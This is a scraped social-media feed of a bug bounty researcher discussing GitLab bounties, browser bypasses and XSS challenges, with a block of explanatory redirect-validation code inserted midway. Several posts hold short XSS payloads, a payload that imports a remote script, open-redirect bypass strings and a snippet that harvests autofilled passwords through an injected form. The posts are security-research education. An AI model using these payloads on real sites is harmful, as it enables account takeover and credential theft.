Johan Carlsson

@joaxcar

Followers
4,172
Following
156
Media
95
Statuses
1,127

Father and developer during the day, looking for bugs at night 🐞. Using Twitter for infosec only. Also on: @joaxcar@infosec.exchange

Joined January 2022
Pinned Tweet
@joaxcar
Johan Carlsson
8 months
I joined @gregxsunday on his podcast a while back. Realized I did not have a tweet with it to “pin”. Here is that tweet. Good intro to what I am doing if someone is curious
1
13
90
@joaxcar
Johan Carlsson
2 years
Yesterday I made it into top 5 on @GitLab bug bounty program 🥳, at the same time crossing 100k in bounties from the same. Some people are asking me how to get started or where and what to look for. I thought I could share a practical guide if anyone cares for a thread [1/6]
26
172
940
@joaxcar
Johan Carlsson
2 years
Looks like this is the time to learn how to hunt for leaked GitLab tokens 👀
17
55
512
@joaxcar
Johan Carlsson
7 months
I have finally done my first proper bug write-up! This one is about a SOP bypass in Chrome (escalated to ATO) using the Navigation API. Hope someone finds it interesting. Feel free to leave me any comments; I want to improve on this!
9
116
508
@joaxcar
Johan Carlsson
3 months
Did a little writeup of the CSP bypass I reported to PortSwigger. It might be interesting to anyone who saw the disclosed report and wonders if CSP bypasses are the new ripe low-hanging fruit!
4
93
352
@joaxcar
Johan Carlsson
6 months
Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or are trying to get away from copy-pasting payloads
23
46
273
@joaxcar
Johan Carlsson
2 months
Just dropped off my work computer at the office. From tomorrow I will do bug bounties full time for three months. After that, I'll evaluate whether my mental health can cope with it. Wish me good luck!
44
3
269
@joaxcar
Johan Carlsson
2 years
My first disclosure to reach 100 up-votes on @Hacker0x01 . Disclosures have been the number one learning resource for me, so to see people finding an interest in my own reports makes me happy! Also thanks @gitlab for allowing full disclosures, contributing to this great resource
6
21
259
@joaxcar
Johan Carlsson
2 years
Free online hacking course 🥳
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by @wcbowling : - Bounty: $33,510 #hackerone #bugbounty
3
71
346
4
17
167
@joaxcar
Johan Carlsson
18 days
I have now done half of my three-month full-time hunting. Thought I could share some stats.
25 submissions:
🟢 1 resolved
🟠 12 triaged
🔵 6 pending
🟤 6 dupes (2 self dupes)
Tools used: 0
Scans run: 0
💰 Economy: I paid my salary with that resolved one
13
4
164
@joaxcar
Johan Carlsson
2 years
Another amazing @fransrosen report to study! Guess the arkoselabs[.]com XSS impacted a lot more sites, but nice usage of it here on GitLab in chain to ATO
1
33
163
@joaxcar
Johan Carlsson
5 months
Try to catch the XSS 🧐 Think this one is a bit harder, but feel free to prove me wrong! No answers in the comments, please
19
23
144
@joaxcar
Johan Carlsson
11 months
Finally made it past 3000 reputation. The last 1k took a long time as I have had less time to hunt. For information, 3k puts you in the top 550 at @Hacker0x01 , and miles from top 100
11
1
135
@joaxcar
Johan Carlsson
8 months
After two years and more than 100 written reports, ranging from "self closed" to "high", I finally found my first Critical finding on GitLab's bounty program! A lot of luck but also persistence and grind. Checking one item off the bucket list
7
13
114
@joaxcar
Johan Carlsson
5 months
I'm glad to see that quite a few people found this interesting! My solution (and the one that others found) goes like this: \"-alert(1)}})<!--
@joaxcar
Johan Carlsson
6 months
Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or are trying to get away from copy-pasting payloads
23
46
273
1
13
115
@joaxcar
Johan Carlsson
1 year
Nice bug! Don't really like this "it's a third party tool" argument to lower the bounty; I think the impact should be the measurement. Always good to look for mentions of this in the program scope
@disclosedh1
publiclyDisclosed
1 year
HackerOne disclosed a bug submitted by fransrosen: - Bounty: $500 #hackerone #bugbounty
0
26
117
7
9
113
@joaxcar
Johan Carlsson
1 year
Found a URI leak bypassing SOP in Firefox
1
10
110
@joaxcar
Johan Carlsson
2 months
People in the community sending death threats to tool creators when they have issues with their tools!? really? I like this Rs0n guy, he is doing his own thing. Please respect anyone sharing FREE content, or GTFO
7
16
107
@joaxcar
Johan Carlsson
19 days
Two new DOM sinks to add to any sink list: setHTMLUnsafe and parseHTMLUnsafe. The first one might start to replace some instances of innerHTML. After Chrome 124 it works in all browsers
1
15
108
@joaxcar
Johan Carlsson
5 months
Finally, I had time to finish the writeup for the hoist challenges. Hope someone finds it valuable. Great job everyone who solved it!
@joaxcar
Johan Carlsson
5 months
Try to catch the XSS 🧐 Think this one is a bit harder, but feel free to prove me wrong! No answers in the comments, please
19
23
144
8
21
101
@joaxcar
Johan Carlsson
5 months
Another XSS challenge. This one is a bit more contrived. Mission:
1. just pop alert
2. run arbitrary JS
Don't write the solution in the thread!
4
14
101
@joaxcar
Johan Carlsson
2 years
Finding a critical bug 5 mins before Friday dinner with my kids gives mixed feelings. Destroy dinner by reporting asap or get duped, but with a happy family? Hard choice 🤷‍♂️
7
0
94
@joaxcar
Johan Carlsson
11 months
This one was weird: "we had a regression and many others reported it, so we will lower the bounty to 10%". I mean, either you have a vulnerability or you don't. Blaming regression was a new one.
@disclosedh1
publiclyDisclosed
11 months
Reddit disclosed a bug submitted by mrzheev: - Bounty: $500 #hackerone #bugbounty
0
12
55
13
7
87
@joaxcar
Johan Carlsson
27 days
Did something fun with this the other week. "Form clobbering"
4
8
85
@joaxcar
Johan Carlsson
5 months
What about x.y.z("test-INJECT") should not be too hard
@Rhynorater
Justin Gardner
6 months
Somebody asked me recently if you can exploit an XSS scenario like this: x.y(1,INJECT); where x and y are not defined. You cannot break out of the script tag, but you can break out of the function call. I tried everything I could think of to abuse error handling and hoisting…
13
27
149
15
13
80
@joaxcar
Johan Carlsson
9 months
Finally made it to top three at @gitlab 's bounty program! 🥳 It's getting harder and harder to climb this ladder. Just need to double up to get that first place..
5
1
78
@joaxcar
Johan Carlsson
1 year
This report to GitLab by @ryotkak shows a great way to use the "dirty dance none happy path OAuth feature", discussed in @fransrosen 's blog post, to escalate a chain of open redirects to account takeover
1
19
74
@joaxcar
Johan Carlsson
1 year
Some personal highlights 2022 on @gitlab :
- Most valid reports in 2022 (22)
- Made it to top 4 on leaderboard
- 120k bounties
- At least one valid report per month
Great program, great team!
@gitlab
🦊 GitLab
1 year
🎉 Here's what a record-breaking Bug Bounty year looks like.
🤑 Awarded a total of $1,055,770 USD in bounties in 2022
📈 Received a total of 920 reports from 424 researchers
🔧 Resolved 158 valid reports and made 94 public
3
25
121
5
0
73
@joaxcar
Johan Carlsson
2 years
Another XSS in @GitLab . This one used an unsanitized URL for the payload, and a poorly sanitized HTML element to increase the impact probability. Delivered to the GitLab server by a spoofed ZenTao server.
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by @joaxcar : - Bounty: $13,950 #hackerone #bugbounty
0
10
72
2
7
73
@joaxcar
Johan Carlsson
1 year
Found a small issue in Grafana; the fix is out now in the latest release (CVE-2023-1387). Grafana uses the GitHub vulnerability reporting feature, which is really nice to work with, putting some pressure on the big platforms out there 😊
2
10
73
@joaxcar
Johan Carlsson
2 years
Until recently I have taken zero notes and have to re-google everything all the time. The new me is using @GitLab to structure my research 😎 Thanks go out to @realArcherL , @dee__see , and @ajxchapman for amazing tips in
2
22
72
@joaxcar
Johan Carlsson
11 months
Here we go again! Still no sign of the 20% policy in the policy @Hacker0x01 😊. Clear rules are important; the guy here spent a lot of extra time working on this issue without info about the hidden rules.
@disclosedh1
publiclyDisclosed
11 months
HackerOne disclosed a bug submitted by @lotus_619 : - Bounty: $1,576 #hackerone #bugbounty
5
15
87
2
4
68
@joaxcar
Johan Carlsson
3 months
I spent quite some time on this challenge by @kevin_mizu . Ended up finding a new jQuery CSPP gadget using $().on() event creation. Did a writeup on the process of finding the gadget 👇
@kevin_mizu
Kévin - Mizu
3 months
Challenge time is now over ⏰ TL;DR
- HTML injection
- Axios DOM Based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇
0
13
80
1
11
66
@joaxcar
Johan Carlsson
6 months
There are some good and common ways to gain redirects, like "@" and "." but I have also had a lot of success with "//". A lot of simple filters check if the URL is "relative" by checking if it starts with a slash, forgetting that //attacker[.]com is not relative.
@ctbbpodcast
Critical Thinking - Bug Bounty Podcast
6 months
Freaking good redirect validation bypass payload: http://attacker[.]com\@test[.]com The backslash will be normalized to a slash by the browser and result in the OR. I see this issue a lot. (Obviously [.] is not a part of the payload, it prevents X from turning it into a link)
3
23
176
1
8
67
@joaxcar
Johan Carlsson
2 years
1-click XSS to ATO rated as LOW severity... glad I am not doing bug bounties full time 🙃
7
2
66
@joaxcar
Johan Carlsson
1 year
A program on HackerOne has asked me for about 10 retests, without using the paid retest feature. After some days I have now gotten "any update sir" requests on them, the tables have turned! 😊
3
0
55
@joaxcar
Johan Carlsson
2 years
The easiest way to find out what to look for is the latest security release. See what others are finding at the moment; usually there are more bugs of the same type present [2/6]
1
5
57
@joaxcar
Johan Carlsson
1 year
Got the third place in Sweden by one point this year 🥳. Have not focused on quantity, and the point system is a bit weird. Still fun gamification though!
6
0
58
@joaxcar
Johan Carlsson
1 year
Great talk by @spaceraccoonsec outlining how to approach the changing landscape of bug-bounty/infosec. The point about plateauing in skill level by getting stuck finding and reporting similar bugs really resonated with me.
0
16
57
@joaxcar
Johan Carlsson
2 months
Great post by @garethheyes . I have used the form trick multiple times. I also find it strange that does not include it in their "safe example" (or as a warning). This could be one of the reasons why it's so often overlooked
@PortSwigger
PortSwigger
2 months
Are CSP's getting in the way of scoring that Bug Bounty you have been working on? 😫 Lucky for you, our research team ( @PortSwiggerRes ) has released some new techniques using Form Hijacking to bypass that protection and get you hacking again; enjoy!
2
60
233
1
6
57
@joaxcar
Johan Carlsson
7 months
Tweet explained:
1. reportError is "new" as of Chrome 95
2. It only takes 1 argument. The second arg here is just an inline assignment
3. You need the = before alert as the string produced by the error is "Uncaught <payload>" and eval needs valid syntax
Nice one! Fun to dig into
@PortSwiggerRes
PortSwigger Research
7 months
The new reportError() function enables a quite amusing XSS vector:
3
49
323
5
4
55
@joaxcar
Johan Carlsson
2 years
Another HTML injection, resulting in arbitrary POST requests as victim user. In worst case getting admin access to the GitLab instance. Payload delivered through Jira integration
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by @joaxcar : - Bounty: $8,690 #hackerone #bugbounty
0
6
46
2
7
52
@joaxcar
Johan Carlsson
2 years
Found a duplicate high severity bug on @GoogleVRP . Will nevertheless count it as my first valid bug on their program 🥳 Getting that duplicate email is not a great feeling, but it at least shows that finding Google bugs is not out of reach
2
1
53
@joaxcar
Johan Carlsson
1 year
Interesting write-up about a blockchain bug. Scoring 1M$ in bounty. Key takeaway after reading: It's all about domain knowledge! The same goes for all programs, there are tons of "simple" bugs that you can only find if you know the domain.
2
6
53
@joaxcar
Johan Carlsson
28 days
So what's up with this JSONP throwing the "bad callback error" to get executed by the bad callback 🙃
7
6
52
@joaxcar
Johan Carlsson
1 year
Must admit, I did not know what this Hackvertor thing by @garethheyes was all about. After watching this video, I will not be able to live without it! 🙇‍♂️
1
6
52
@joaxcar
Johan Carlsson
13 days
Finally got another payout! I can now pay my salary for April as well 😅
@joaxcar
Johan Carlsson
18 days
@joernchen no, I have only had to pay myself for one month so far. The next one is due in a week. Let's pray for some more payouts! (on a serious note, I had the economy for all months from the get-go and would not have done this otherwise). But it did pay more than my day job
1
0
4
4
2
51
@joaxcar
Johan Carlsson
7 months
This is sad as I did not get to use my fun "hidden payload" in userinfo. The second one is still working though! Also, note that userinfo stays in the URL on relative links!
@garethheyes
Gareth Heyes
7 months
My current fav XSS has gone 😢 <script>location.protocol='javascript'</script> No longer works 👎
6
8
68
2
2
51
@joaxcar
Johan Carlsson
5 months
Time for a solution here. ");import"//nj.rs"//
@joaxcar
Johan Carlsson
5 months
What about x.y.z("test-INJECT") should not be too hard
15
13
80
3
6
50
@joaxcar
Johan Carlsson
2 months
From what I can see this is just a UI bug. I would recommend @Hacker0x01 to fix this promptly as a lot of people are getting confused and making allegations against triagers (tip: don't!). The dupe is the same program (all the time) @jobertabma #bugbountytip
1
1
49
@joaxcar
Johan Carlsson
2 years
Nice and clean XSS in GitLab. Worth noting here that the CSP bypass works for all scripts generated by other scripts decorated with a valid nonce. The trust is inherited. In this case jQuery is loaded with a nonce. Included scripts are a great place to look for CSP bypasses
@yvvdwf
yvvdwf
2 years
CSP-bypass using jQuery: if you see $(a).append(html), then try html="<script>alert(1)</script>" Example:
2
35
121
0
5
47
@joaxcar
Johan Carlsson
5 months
I spend a lot of time playing with quirks in JavaScript. They are often great for hacking. But there is also a case to be made for learning how things are meant to be used. I found this course by Dan Abramov very insightful and highly recommend it:
2
6
46
@joaxcar
Johan Carlsson
6 months
@garethheyes @Rhynorater @avlidienbrunn @jub0bs @LiveOverflow Hey thanks for inspiration! x.y(alert(1));function x(){}
5
5
46
@joaxcar
Johan Carlsson
7 months
Let's keep the inspiration flowing. The last three could probably be done better, but I am quite happy with the pathname one.
@garethheyes
Gareth Heyes
7 months
Wait. What. Hehe. https://alert(1)@ example. com <a href=/ id=x>test</a> <script> eval(x.username) </script> Inspired by:
4
22
175
2
7
46
@joaxcar
Johan Carlsson
2 years
This is what deep knowledge of your target can do for you while hunting for bugs! Another amazing escalation of a "trivial issue" by  @wcbowling Getting at the @gitlab CTF flag
0
6
46
@joaxcar
Johan Carlsson
1 year
My twitter feed
Musk: Trump!
Andrew Tate: Maaaaan!
Bots: Crypto!
My mastodon feed
Security researchers: long detailed informative posts
Sorry but I only signed up here for infosec, will still check in here but will focus on @joaxcar@infosec.exchange
1
0
44
@joaxcar
Johan Carlsson
1 year
If I can control response headers on a service, which ones can be abused? Like "Set-Cookie" to set cookies on the domain, "Location" for redirects, and CORS headers to loosen restrictions. What more? The victim is the visitor, I control the response on the target domain. (no XSS)
13
2
43
@joaxcar
Johan Carlsson
2 years
If you follow these steps you will have learned a LOT about security, DOS issues, GitLab, setting up environments and replicating vulnerabilities. You will also most certainly be in a great position to find your first bug on the GitLab @Hacker0x01 program. [6/6]
2
3
44
@joaxcar
Johan Carlsson
11 days
Turning 37 today. My mother sent me this. Child 1337 😎 (and no, that's not my social security number at the bottom)
7
0
45
@joaxcar
Johan Carlsson
4 months
Managed to find my way into the 2023 @gitlab bounty highlights. Such a great program! Congrats to @yvvdwf for a well deserved “best report” again, and pwnie for a hard to contest “highest impact”
7
0
43
@joaxcar
Johan Carlsson
2 years
This report is a great example of the goldmine that @Hacker0x01 Hacktivity is. The report is a bit confusing, and it took a couple of tries to recreate based on the description. But I had never heard of the Service Worker API before, learning so much from this one!
@disclosedh1
publiclyDisclosed
2 years
GitLab disclosed a bug submitted by ehhthing: - Bounty: $1,680 #hackerone #bugbounty
0
9
18
0
5
43
@joaxcar
Johan Carlsson
2 years
Some follow up here [7/6]
1. ⚠️ Do not ever test DOS on gitlab[.]com or other production instances! Only self-hosted
2. Why DOS? It's arbitrary, the point is to find an area to focus on to not get analysis paralysis
3. This is how I started, but with a focus on GraphQL AC
3
3
42
@joaxcar
Johan Carlsson
2 months
This was fun. I disagree with most of it, but still some valid points. They are correct in what they point out is a bad approach to BB, but the idea that they would know everything about an application after one engagement?! Well, I respectfully disagree
1
4
42
@joaxcar
Johan Carlsson
8 months
@renniepak @0xH4rmony <script/src="//0-a%2enl"></script> 34 chars, browsers are nice enough to correct the missing space
3
6
40
@joaxcar
Johan Carlsson
5 months
Another great post on hoisting by @brutelogic ! Missed this one when doing my own research. Interestingly the payload from my post works on the second example (undefined2.php) without hijacking atob: %27-alert(1));function%20myObj(){}//
@BRuteLogic
Brute Logic
5 months
A good technique to deal with JSi based undefined scenarios. #XSS
1
19
71
2
5
40
@joaxcar
Johan Carlsson
1 year
Not the most advanced bug, but a good one to look for. I have found multiple instances of this in multiple programs. The bug type is also covered in
@gregxsunday
Bug Bounty Reports Explained
1 year
We all know path traversals. But did you hear about a client-side path traversal? There are few resources about this bug class so many hackers don't check for it. Don't be one of them! Start by watching my explanation of @joaxcar 's $6,580 bug in GitLab!
3
28
136
0
9
40
@joaxcar
Johan Carlsson
2 years
Now go to the GitLab issue tracker and search for old DOS security issues. Read them all. Then install any vulnerable version in a docker container and replicate some of the issues. Try to recreate the ones from 15.3.2 [4/6]
1
4
40
@joaxcar
Johan Carlsson
5 months
This right here! Not that I ever found a RCE, but this mindset applies to other bug types. For me XSS is part of impact. Bugs that lead me there are usually HTML injections
@GodfatherOrwa
Godfather Orwa 🇯🇴
5 months
@intigriti It depends how you look for RCE. Some look for RCE as bug, some look for RCE as impact. As example LFI to RCE (the bug is LFI and the Impact is RCE). I look for RCE as impact not bug & I automate on bugs that can lead to RCEs
6
19
170
3
7
39
@joaxcar
Johan Carlsson
1 year
Sure AI can become a threat to bug hunters income, but I see no one talking about these people trying to deprecate JavaScript URL scheme!
1
6
38
@joaxcar
Johan Carlsson
2 years
For us living in the DevTools console my life is going to become so much smoother! Going to use on Monday:
$_
monitor(foo)
getEventListeners($0)
queryObjects(Promise)
1
5
39
@joaxcar
Johan Carlsson
5 months
It may be too soon for another challenge, but I needed to get this out before posting a write-up about a WebKit mime sniffing bug. Let's see if you can find some unintended solutions here. I guess there could exist a few. Mission: XSS 🤷‍♂️
1
10
39
@joaxcar
Johan Carlsson
2 years
In 15.3.2 there were five DOS bugs, all given a medium severity. DOS bugs like these are present in almost every GitLab security release lately. They are easy enough to replicate, and one can hunt for them both statically and dynamically. [3/6]
1
3
38
@joaxcar
Johan Carlsson
1 year
This feature! 🔥 Thanks Chrome v.112
1
2
37
@joaxcar
Johan Carlsson
7 months
I have (yet again) started a new blog, this time using WordPress! Yes you read that correct, no more static site generators for me. I hope this transition will help me actually post some content. Time will tell; this first one is just to get started
0
2
38
@joaxcar
Johan Carlsson
1 year
Great interview with @samm0uda by @gregxsunday . Youssef's approach to bug bounties really resonates with me, will come back and rewatch this one for sure. Thanks for taking the time Youssef!
@gregxsunday
Bug Bounty Reports Explained
1 year
Last week, I published a video saying $5.5k is my highest bounty. Today, I’m uploading an interview with a hunter who doesn’t bother reporting $4-5k bugs and only focuses on the big ones. It's @samm0uda , TOP1 on Facebook leaderboard since 2020. Enjoy!
12
54
322
0
6
36
@joaxcar
Johan Carlsson
6 months
Turns out that the last one is wrong. That trick only works if you change the schema in the new URL:
new URL("http:a.a", "https://b.b")
new URL("https:a.a", "http://b.b")
or
new URL("file:etc/passwd", "https://b.b")
@joaxcar
Johan Carlsson
6 months
1
6
33
1
10
35
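Both the redirect-validation discussion earlier on this page (the leading `//` and the `\@` payloads) and the URL-constructor quirk in the post above come down to how the WHATWG URL parser resolves an input against a base. The following is an added example, not code from the original posts or from any of the people quoted: a weak "starts with a slash or mentions our host" check beside a hardened one that resolves the candidate exactly as a browser would and compares origins, plus a helper that shows the scheme-change behaviour. The site origin `https://app.example`, the function names and the sample targets are assumptions made for illustration.

```javascript
// Added example, not from the original page. Assumed origin of the site that
// performs the redirect (illustrative value).
const SITE_ORIGIN = "https://app.example";

// Weak check of the kind described in the thread: call the target "relative"
// if it starts with a slash, or "ours" if it mentions our host anywhere.
function weakIsSafeRedirect(target) {
  return target.startsWith("/") || target.includes("app.example");
}

// Hardened check: let the WHATWG URL parser (the same one browsers use)
// resolve the candidate against the site origin, then compare origins.
// Returns the normalised absolute URL on success, or null to refuse.
function safeRedirectTarget(target, siteOrigin = SITE_ORIGIN) {
  let resolved;
  try {
    resolved = new URL(target, siteOrigin);
  } catch (e) {
    return null; // unparsable input is refused, never passed through
  }
  const expected = new URL(siteOrigin).origin;
  if (resolved.origin !== expected) return null;
  // Same origin, but userinfo in a redirect target is never legitimate here,
  // so refuse it rather than letting later code be confused by it.
  if (resolved.username !== "" || resolved.password !== "") return null;
  return resolved.href;
}

// Shows the quirk from the post above: a scheme prefix without "//" is a
// relative reference when it matches the base scheme, and a brand new
// absolute URL when it does not.
function resolveAgainst(input, base) {
  return new URL(input, base).href;
}

// Constructed sample targets (not taken from the page) run through both checks.
const SAMPLE_TARGETS = [
  "/dashboard",                           // genuinely relative
  "//evil.example/phish",                 // protocol-relative, not relative
  "https://evil.example\\@app.example/",  // backslash ends the authority
  "http:evil.example",                    // scheme change: becomes absolute
  "https:evil.example",                   // same scheme: stays a relative path
];

function compareChecks(targets = SAMPLE_TARGETS) {
  return targets.map((t) => ({
    target: t,
    weak: weakIsSafeRedirect(t),
    hardened: safeRedirectTarget(t),
  }));
}

console.log(JSON.stringify(compareChecks(), null, 2));
```

The weak check accepts `//evil.example/phish` (starts with a slash) and `https://evil.example\@app.example/` (contains the host name), while the hardened check resolves both to an origin of `https://evil.example` and refuses them. `https:evil.example` resolves to a path on the site's own origin, so the hardened check allows it as `https://app.example/evil.example`, which is exactly the same-scheme behaviour the post above describes.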
@joaxcar
Johan Carlsson
4 months
It's been a long winter... I also realized I had broken the challenge... well here is the long-awaited solution. "in%0balert%60%60in" or in plain English "in(mysterious space)alert``in"
@joaxcar
Johan Carlsson
5 months
Another XSS challenge. This one is a bit more contrived. Mission:
1. just pop alert
2. run arbitrary JS
Don't write the solution in the thread!
4
14
101
1
5
36
@joaxcar
Johan Carlsson
10 months
@Rhynorater using XSS to add a form and steal autofill password 🙂 this one can sometimes bypass some other restrictions, like XSS on a subdomain. But requires a great program, a great PoC, and some smooth report writing!
1
2
33
@joaxcar
Johan Carlsson
8 months
My first WebKit bug was resolved. I'm still waiting to see if Apple pays bounties for more minor issues in their apps. The information is not super clear on this. At least I finally have a CVE in all major browsers that I can use to brag with on Linkedin 🙂
1
0
34
@joaxcar
Johan Carlsson
2 years
Now think about how these issues were fixed and what caused them. Look in the merge requests for 15.3.2 and read how they were mitigated. Try to see if you can find a flaw in the fix, or if anything can point to other vulnerable areas. [5/6]
1
3
34
@joaxcar
Johan Carlsson
6 months
1
6
33
@joaxcar
Johan Carlsson
1 year
@PinkDraconian @PortSwigger Yes, but if you have XSS you can do this by just adding your own form, no need to find a form:
document.body.innerHTML = `<form><input><input id=x type=password></form>`
alert(x.value)
4
0
31
@joaxcar
Johan Carlsson
1 year
Had a fun chat with @gregxsunday , not used to the audio format so it starts out a bit stumbling on my part, but hope someone might get some enjoyment out of it 😊
@gregxsunday
Bug Bounty Reports Explained
1 year
Other people's reports are a great learning resource but it's even better to ask them about methodology and techniques. From my interview with @joaxcar , you will learn why he was successful in bug bounty since day one and how he climbed to GitLab's TOP4
3
21
114
2
1
32
@joaxcar
Johan Carlsson
25 days
This week might become the first one on my "full-time" sprint where I will not be able to find a bug. Not the best feeling... Let's hope that Friday proves me wrong
1
0
30
@joaxcar
Johan Carlsson
1 year
I have been trying to learn to use SQLmap. But trying it on a parameter where the injection needed to break out uses double quotes instead of single quotes causes SQLmap to miss the injection. Is there an option for this?
6
4
31
@joaxcar
Johan Carlsson
1 year
I have been doing all my bug hunting up until now from a 2014 MacBook Air. Thinking about taking the leap and investing in some new hardware. Is it only RAM that matters (due to Burp) or can I benefit from other spec increases?
5
0
29
@joaxcar
Johan Carlsson
6 months
Programs should just stop shoehorning everything into CVSS. A “one off” leak of some random data can have impact ranging from informative to critical. Just keep a separate bounty table for leaks, and you don't have to bend CVSS to match what you want to pay
@PikuHaku
Eldar
6 months
@disclosedh1 @bebiksior While I do agree with the overall assessment of medium severity, the reasoning they give for the CVSS is pretty shit. Setting user interaction to required with the reasoning : "A staff member that owns the form misconfigured permissions which lead to being able to access the…
4
2
57
0
4
27
@joaxcar
Johan Carlsson
12 days
@caseyjohnellis Then, give us the actual purpose!? 😀 Are platforms hosting the VDPs for free? Or BB programs, for that matter. It better not be that platforms are doing this to profit 🤯 Sry for sarcasm, but sometimes it sounds like hunters are the only ones trying to monetize this space
3
2
30
@joaxcar
Johan Carlsson
9 months
In this thread, I gave the advice to look for DOS bugs in GitLab. Looking through subsequent security releases, that was great advice! Too bad it is really hard to follow even one's own advice sometimes 😀
@securibee
Thrive with the Hive 🐝
9 months
A practical guide of how @joaxcar made it into GitLab bug bounty top 5 #HiveArchive
0
3
11
2
1
27
@joaxcar
Johan Carlsson
5 months
Every time I start writing a longer post about any subject, I get halfway and then feel like what I am describing is so banal that I am wasting everyone's time. Not to mention my own. I usually don't have imposter syndrome, but when it comes to writing, I lack all confidence.
8
2
27
@joaxcar
Johan Carlsson
1 year
Got my name on Red Hat's acknowledgements page. Found something as I was researching another program. I try to report everything I find as long as the company has some sort of responsible disclosure guidelines. (Can't believe how many companies don't even have a security email)
1
0
26
@joaxcar
Johan Carlsson
2 years
Got my own first "Good catch!" some weeks ago, great feeling! This video got me excited to get back into looking at Google products 🐞
0
2
27
@joaxcar
Johan Carlsson
2 years
@therceman You can read about their bounty calculation here. These levels are usually for GitLab tokens giving access to their own repos. But you're right, they do not accept other user tokens, so do not report those
2
4
26
@joaxcar
Johan Carlsson
7 months
This will be my first LHE. Super excited! Also super nervous... looking forward to meeting some of the hackers that I have admired since starting on this journey into cybersecurity
@intigriti
Intigriti
7 months
Gear up, cyber knights! ⚔️ The countdown begins for the Knights of Elektron Live Hacking Event, a collaboration between Intigriti and @IntelSecurity 's Project Circuit Breaker! 🌐 The upcoming live hacking event will be unlike anything they’ve ever done before. This Friday,…
6
29
92
2
0
26